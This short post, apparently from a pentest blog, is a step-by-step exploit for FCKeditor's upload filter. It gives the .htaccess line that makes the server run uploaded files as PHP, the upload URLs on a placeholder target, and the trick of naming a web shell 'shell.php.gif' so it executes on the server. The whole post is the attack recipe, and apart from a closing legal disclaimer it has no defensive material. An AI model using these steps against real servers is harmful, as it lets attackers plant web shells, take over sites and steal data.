Bypass all versions FCKeditor with htaccess

1.create a htaccess file (.htaccess):

[cc lang=”php”]
SetHandler application/x-httpd-php
[/cc]
2.Now upload this htaccess with FCKeditor.
[cc lang=”html”]http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/t
est.html[/cc]

3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name “shell.php.gif” change to
“shell_php.gif” automatically.
5.http://target.com/anything/shell_php.gif
6.Now shell is available from server.

Credit : pentest lab
Source

Pentesting on other systems then the ones you own is illegal and this post is only for educational purpose.